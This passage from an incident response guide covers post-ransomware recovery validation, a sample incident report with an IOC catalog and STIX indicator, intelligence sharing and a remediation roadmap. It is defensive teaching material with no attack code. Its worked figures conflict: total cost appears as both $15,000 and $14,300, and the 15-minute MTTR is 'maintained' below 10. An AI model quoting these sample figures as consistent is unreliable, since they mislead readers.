**Business-Critical Services:**
1. **Authentication** - Test user logins, SSO, MFA
2. **Email** - Send/receive test messages
3. **File Shares** - Access permissions intact
4. **Databases** - Application connectivity, query performance
5. **VPN** - Remote access functionality
6. **Cloud Services** - AWS/Azure/GCP access and permissions
7. **Payment Processing** - PCI-compliant transaction flow

Performance Testing:

• Baseline metrics: Response time, throughput, error rate
• Compare to pre-incident baselines
• Identify any degradation requiring optimization

Security Validation:

**Final Security Checks:**
- [ ] Full vulnerability scan (Nessus, Qualys, OpenVAS)
- [ ] Penetration test of initial attack vector
- [ ] Review user account permissions (least privilege)
- [ ] Verify backup integrity and restoration capability
- [ ] Test disaster recovery procedures
- [ ] Validate security tool functionality (EDR, SIEM, IDS/IPS)

Key Deliverable: Recovery Timeline & Validation Report

Recovery Documentation:

**Recovery Timeline:**
- 2025-01-07 18:00 - Clean Windows image deployed to DESKTOP-01
- 2025-01-07 18:30 - All Windows updates applied
- 2025-01-07 19:00 - User data restored from pre-infection backup (2025-01-05)
- 2025-01-07 19:30 - Credentials rotated for affected user
- 2025-01-07 20:00 - System rejoined domain
- 2025-01-07 20:30 - IOC monitoring rules deployed to SIEM
- 2025-01-07 21:00 - 48-hour monitoring period begins

**Validation Test Results:**
- Authentication: ✅ Passed
- Email delivery: ✅ Passed (SPF/DKIM/DMARC verified)
- File share access: ✅ Passed
- Vulnerability scan: ✅ No critical findings
- EDR scan: ✅ Clean
- Network monitoring (48h): ✅ No IOC detections

**Sign-Off:**
- Lead Investigator: John Doe (2025-01-09 21:00)
- IT Operations: Jane Smith (2025-01-09 21:15)
- Incident Commander: Bob Johnson (2025-01-09 21:30)
- Status: ✅ System restored to production

Stage 7: Post-Incident Activity & Lessons Learned (1-2 weeks)

According to SANS post-incident review guidance, the lessons learned phase is often neglected but provides the highest ROI for improving security posture. This stage transforms incident experience into organizational resilience.

Step 7.1: Comprehensive Incident Documentation

Final Incident Report Components:

1. Executive Summary (1-2 pages)

**Incident Overview:**
- Incident Type: Ransomware attack via phishing email
- Detection Date: 2025-01-07 03:47:00 UTC
- Resolution Date: 2025-01-09 21:30:00 UTC
- Total Duration: 66 hours from detection to full recovery
- Severity: P2 (High) - Single endpoint, no data exfiltration

**Impact Assessment:**
- Systems Affected: 1 workstation (DESKTOP-01)
- Users Affected: 1 (Finance Department)
- Data Impact: No data loss (restored from backup)
- Downtime: 2 business hours for affected user
- Financial Impact: $15,000 (IR team labor, forensics, lost productivity)

**Response Effectiveness:**
- Detection: Automated (EDR alert)
- Response Time: 15 minutes to containment
- Eradication: Complete within 24 hours
- Recovery: Full restoration within 66 hours
- Reinfection: None detected (30-day follow-up)

2. Detailed Timeline (Complete attack progression)

• See Stage 4.1 for timeline format
• Include all attacker actions, IR team actions, and business impact events

3. Root Cause Analysis

**Initial Attack Vector:** Phishing email bypassed email security gateway

**Contributing Factors:**
- User clicked malicious attachment (insufficient security awareness)
- Endpoint antivirus did not detect initial payload (0-day malware)
- EDR detected suspicious behavior but 15-minute delay in alert (tuning needed)
- No MFA on compromised account (enabled single credential compromise)

**Root Cause:** Lack of email attachment sandboxing + insufficient user training

4. IOC Catalog (Complete indicator list)

• File Hashes: (MD5, SHA-1, SHA-256 of malware samples)
• IP Addresses: 185.220.101.45 (C2 server), 192.0.2.100 (download server)
• Domain Names: evil-domain[.]com, update-server[.]net
• Email Addresses: phishing@fake-invoice[.]com
• Registry Keys: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
• Scheduled Tasks: "Windows Update Check" (persistence)
• Mutexes: Global\Malware_Mutex_v2

Use IOC Extractor and URL Defanger to compile and safely share IOCs.

5. Financial Impact Assessment

**Direct Costs:**
- IR Team Labor (40 hours × $150/hr): $6,000
- Forensic Analysis (20 hours × $200/hr): $4,000
- System Rebuild (8 hours IT time): $800
- Total Direct: $10,800

**Indirect Costs:**
- Lost Productivity (1 user × 2 days): $2,000
- Management Time (meetings, reporting): $1,500
- Reputation Impact: Not quantifiable

**Total Incident Cost: $14,300**

**Cost Avoidance:** Data breach avoided (estimated $500K if ransomware spread)

6. Compliance Notifications (If applicable)

• GDPR breach notification (if EU data affected)
• HIPAA breach reporting (if PHI accessed)
• PCI-DSS incident reporting (if payment card data compromised)
• SEC cybersecurity disclosure (if material impact to publicly traded company)

Step 7.2: Threat Intelligence Sharing

Goal: Contribute to community defense by sharing IOCs and TTPs.

Intelligence Sharing Platforms:

• Threat Intelligence Feed Aggregator - Export IOCs in STIX/TAXII format
• MISP (Malware Information Sharing Platform) - Share with trusted communities
• AlienVault OTX - Public threat intelligence platform
• VirusTotal - Upload malware samples (if not already present)
• ISACs - Information Sharing and Analysis Centers (FS-ISAC, Health-ISAC, etc.)

STIX Format Example:

{
  "type": "indicator",
  "spec_version": "2.1",
  "id": "indicator--2025-001",
  "created": "2025-01-09T10:00:00.000Z",
  "pattern": "[ipv4-addr:value = '185.220.101.45']",
  "pattern_type": "stix",
  "valid_from": "2025-01-06T18:32:00.000Z",
  "labels": ["malicious-activity", "c2-server"]
}

Sharing Guidelines:

• Sanitize PII - Remove customer names, employee information
• Defang IOCs - Use URL Defanger to prevent accidental clicks
• Classify Sensitivity - TLP (Traffic Light Protocol) classification
  • TLP:RED - Do not share (internal only)
  • TLP:AMBER - Limited sharing (trusted partners)
  • TLP:GREEN - Community sharing (ISACs)
  • TLP:WHITE - Public sharing (unrestricted)

Attribution Sharing:

• If APT group identified, share TTPs mapped to MITRE ATT&CK
• Campaign names and known aliases
• Malware family identification (e.g., Emotet, TrickBot, Cobalt Strike)

Step 7.3: Defensive Improvements & Remediation

Security Control Enhancements:

Immediate (0-30 days):

1. **Email Security:**
   - Deploy email attachment sandboxing (Proofpoint, Mimecast)
   - Block executable attachments (.exe, .scr, .bat, .ps1)
   - Implement DMARC with p=quarantine (use DMARC Generator tool)

2. **Endpoint Protection:**
   - Tune EDR to reduce alert delay (15 min → 5 min)
   - Deploy application whitelisting on critical systems
   - Enable PowerShell script block logging

3. **Identity & Access:**
   - Mandate MFA for all users (rollout in 2 weeks)
   - Implement privileged access management (PAM)
   - Reduce number of domain admin accounts

4. **Detection:**
   - Deploy IOC-based monitoring rules in SIEM
   - Create alerts for discovered attacker TTPs
   - Implement User and Entity Behavior Analytics (UEBA)

Short-Term (30-90 days):

1. **Security Awareness Training:**
   - Mandatory phishing simulation training for all users
   - Monthly simulated phishing campaigns
   - Incident reporting procedures training

2. **Vulnerability Management:**
   - Implement 7-day SLA for critical vulnerability patching
   - Deploy automated patch management (WSUS, SCCM)
   - Quarterly penetration testing

3. **Backup & Recovery:**
   - Test backup restoration procedures monthly
   - Implement immutable backups (ransomware protection)
   - Verify 3-2-1 backup strategy (3 copies, 2 media types, 1 offsite)

4. **Network Segmentation:**
   - Isolate critical systems (domain controllers, databases)
   - Implement micro-segmentation for sensitive workloads
   - Review and restrict lateral movement paths

Long-Term (90+ days):

1. **Zero Trust Architecture:**
   - Transition to zero trust network access (ZTNA)
   - Implement continuous authentication and authorization
   - Deploy software-defined perimeter (SDP)

2. **Threat Hunting:**
   - Establish proactive threat hunting program
   - Monthly hypothesis-driven hunts based on MITRE ATT&CK
   - Purple team exercises (attacker + defender collaboration)

3. **Security Orchestration:**
   - Deploy SOAR platform for automated response
   - Create automated playbooks for common incidents
   - Integrate threat intelligence feeds into automated blocking

Update IR Playbooks:

• Incident Response Playbook Generator - Update with lessons learned
• Document new detection methods discovered during investigation
• Refine containment procedures based on what worked/didn't work
• Add new IOC sources and validation steps

Step 7.4: Lessons Learned Meeting

Meeting Structure (2-4 hours):

Participants:

• Incident Response Team
• IT Operations
• Security Leadership
• Affected Business Units
• Executive Sponsor

Agenda:

1. **Incident Review** (30 min)
   - Timeline walkthrough
   - Impact assessment
   - Response effectiveness

2. **What Went Well** (30 min)
   - EDR detection capability
   - Rapid containment (15 minutes)
   - Team coordination and communication
   - Clean backup availability

3. **What Went Wrong** (45 min)
   - Phishing email bypassed email gateway
   - User clicked malicious attachment despite training
   - No MFA enabled on compromised account
   - 15-minute delay in EDR alert (missed SLA)

4. **Root Cause Analysis** (30 min)
   - Technical root causes
   - Process gaps
   - Training deficiencies

5. **Action Items** (45 min)
   - Assign owners and deadlines for each improvement
   - Prioritize based on risk reduction
   - Budget approval for new security controls

6. **Metrics Review** (15 min)
   - Mean Time to Detect (MTTD): 9 hours (from infection to detection)
   - Mean Time to Respond (MTTR): 15 minutes (from detection to containment)
   - Dwell Time: 9 hours 15 minutes
   - Time to Recovery: 66 hours

Key Metrics for Continuous Improvement:

Key Deliverable: Final Incident Report & Improvement Roadmap

Report Distribution:

• Executive Summary: C-suite, Board of Directors
• Technical Report: Security team, IT operations
• Sanitized IOCs: Threat intelligence sharing platforms
• Lessons Learned: All incident participants

Improvement Roadmap:

**Q1 2025 (Immediate):**
- [ ] Deploy email attachment sandboxing - Owner: IT Security, Due: 2025-02-01
- [ ] Mandate MFA for all users - Owner: Identity Team, Due: 2025-02-15
- [ ] Deploy IOC monitoring rules - Owner: SOC, Due: 2025-01-20
- [ ] Conduct phishing awareness training - Owner: Security Awareness, Due: 2025-02-28

**Q2 2025 (Short-Term):**
- [ ] Implement automated patch management - Owner: IT Ops, Due: 2025-04-30
- [ ] Deploy privileged access management - Owner: Identity Team, Due: 2025-05-31
- [ ] Quarterly penetration testing - Owner: Security, Due: 2025-06-30

**Q3-Q4 2025 (Long-Term):**
- [ ] Zero trust architecture pilot - Owner: Security Architecture, Due: 2025-09-30
- [ ] Threat hunting program launch - Owner: Threat Intel, Due: 2025-10-31
- [ ] SOAR platform deployment - Owner: SOC, Due: 2025-12-31

Success Criteria:

• No repeat incidents of same attack vector
• MTTD reduced from 9 hours to < 4 hours
• MTTR maintained below 10 minutes
• All action items completed by target dates
• Improved security maturity score (use Cybersecurity Maturity Assessment)

Conclusion

Effective incident response is not a moment—it's a continuous cycle of preparation, detection, investigation, containment, recovery, and improvement. This seven-stage workflow provides a systematic approach aligned with NIST SP 800-61r3 and SANS best practices, ensuring that your organization can respond to incidents with confidence and competence.

Key Workflow Recap

The seven stages form a complete incident response lifecycle. Stage 1 (Preparation) builds IR capability before incidents occur and continues throughout the program. Stage 2 (Detection) provides rapid triage and validation within 15-60 minutes of alert. Stage 3 (Evidence Preservation) ensures forensically sound collection over 1-3 hours. Stage 4 (Investigation) delivers deep threat analysis and attribution across 2-8 hours. Stage 5 (Containment and Eradication) removes the threat within 2-6 hours. Stage 6 (Recovery) restores operations safely over 2-8 hours. Stage 7 (Lessons Learned) drives continuous improvement over 1-2 weeks following resolution.

Ten essential tools support the complete workflow. Hash Generator enables file identification and malware checking. IOC Extractor extracts indicators from forensic data. IP Risk Checker identifies C2 servers. DNS Lookup supports DNS investigation and validation. Email Authentication Validator verifies email security. Threat Intelligence Feed Aggregator correlates multiple feeds. Incident Response Playbook Generator creates customized IR procedures. MITRE ATT&CK Browser maps TTPs and profiles threats. Malware Deobfuscator analyzes obfuscated scripts. String Extractor extracts IOCs from binaries.

Critical Success Metrics

Mean Time to Detect (MTTD):

• World-class: < 1 hour
• Good: < 4 hours
• Industry average: 10 days

Mean Time to Respond (MTTR):

• World-class: < 5 minutes
• Good: < 15 minutes
• Industry average: 30 minutes

Dwell Time (Compromise to Detection):

• World-class: < 1 day
• Good: < 3 days
• Industry average: 10 days

Continuous Improvement Cycle

Quarterly activities maintain incident response readiness. Conduct tabletop exercises simulating ransomware, data breach, and DDoS scenarios. Perform purple team testing through collaborative red team and blue team exercises. Update playbooks incorporating new threat intelligence and lessons learned from recent incidents. Evaluate tools by reviewing SIEM and EDR effectiveness while working to reduce false positives. Review metrics tracking MTTD, MTTR, and dwell time trends to identify improvement opportunities.

Annual activities ensure program currency and effectiveness. Review the IR plan to update contact lists, escalation paths, and regulatory requirements. Verify retainers by confirming IR firm, legal counsel, and PR firm availability. Audit cyber insurance coverage to verify limits and understand notification requirements. Conduct full-scope penetration testing covering both external and internal attack surfaces. Perform maturity assessment benchmarking against the NIST Cybersecurity Framework to measure program progress.

Integration with Broader Security Operations

SOC integration connects incident response with daily operations. Incident response playbooks become automated SOAR workflows that accelerate response to recurring incident types. IOCs from investigations feed directly into SIEM correlation rules, improving detection of related threats. Threat intelligence gathered during incidents enriches detection capabilities across the organization.

Threat hunting benefits from incident response findings. IR investigations reveal attacker TTPs that inform proactive hunting activities. Hypothesis-driven hunts build on MITRE ATT&CK TTPs discovered during incident investigations. Regular sweeps for IOCs from past incidents detect dormant threats or reinfection attempts.

Security engineering applies lessons learned from incidents. Security architecture improvements address vulnerabilities discovered during investigations. Defense-in-depth strategies evolve based on actual attack paths observed in incidents. Zero trust implementation priorities are informed by lateral movement analysis from real attacks.

GRC (Governance, Risk, Compliance) functions leverage incident data. Incident metrics inform risk assessments by quantifying actual threats faced. Compliance audits leverage IR documentation to demonstrate security controls and response capabilities. Board reporting incorporates security posture improvements demonstrated through incident response metrics.

The Path Forward

The difference between a security event and a business catastrophe often comes down to preparation and execution. By following this workflow, maintaining up-to-date playbooks, conducting regular exercises, and continuously improving based on lessons learned, your organization will be prepared to handle incidents with the confidence and competence that stakeholders, customers, and regulators expect.

Remember: The best time to prepare for an incident is before it happens. The second-best time is now.

About This Guide

This workflow guide is designed for educational purposes, empowering security professionals, SOC analysts, and incident responders with practical knowledge and free tools to build effective incident response capabilities. The tools referenced throughout this guide are provided as free resources to help you learn and practice DFIR techniques.

Target audience includes Security Operations Center (SOC) analysts, incident response team members, IT security professionals, digital forensics investigators, and security managers building IR programs.

Skill levels supported range across the analyst tiers. L1 Analysts will find value in the initial triage and detection content in Stages 1-2. L2 Analysts benefit from the deep investigation and containment procedures in Stages 3-5. L3 Analysts focus on threat intelligence and continuous improvement covered in Stages 6-7.

This guide is intentionally tool-agnostic where commercial products are concerned, focusing instead on methodologies and freely available tools that work across organizations of all sizes. While we reference industry-leading commercial platforms (SIEM, EDR, sandboxes), the core workflow applies regardless of specific vendor selections.

Continuous learning extends beyond this guide. Practice these techniques in home lab environments to build hands-on experience. Participate in CTF (Capture The Flag) competitions to test skills against realistic scenarios. Join threat intelligence sharing communities including ISACs and MISP to stay current on emerging threats. Obtain certifications such as GCIH (GIAC Certified Incident Handler) and GCFA (GIAC Certified Forensic Analyst) to validate expertise and advance your career.

Sources & Further Reading

NIST & Government Resources:

• NIST SP 800-61r3: Computer Security Incident Handling Guide (April 2025)
• CISA Incident Detection, Response, and Prevention
• NIST Cybersecurity Framework

SANS Institute Resources:

• SANS Incident Handler's Handbook
• SANS 6-Step Incident Response
• SANS Digital Forensics & Incident Response

Industry Frameworks & Methodologies:

• Incident Response Lifecycle: NIST, CISA, & SANS
• NIST Framework Explained
• DFIR: Digital Forensics and Incident Response
• Cybersecurity Triage Best Practices

Threat Intelligence & Research:

• Mandiant M-Trends Report 2024
• IBM Cost of a Data Breach Report 2024
• CrowdStrike Malware Analysis Framework
• MITRE ATT&CK Framework

Forensic Analysis Resources:

• Static Malware Analysis Guide
• Fortinet Malware Analysis Methodology
• Digital Forensics Tools & Techniques

Tools & Platforms Referenced:

• VirusTotal - Multi-engine malware scanning
• MalwareBazaar - Malware sample repository
• Hybrid Analysis - Free malware sandbox
• AlienVault OTX - Open Threat Exchange
• MISP Project - Threat intelligence sharing platform

Training & Certification:

• GCIH - GIAC Certified Incident Handler
• GCFA - GIAC Certified Forensic Analyst
• GCFE - GIAC Certified Forensic Examiner
• CISSP - Certified Information Systems Security Professional (Domain 7: Security Operations)
• CEH - Certified Ethical Hacker (Incident Response Module)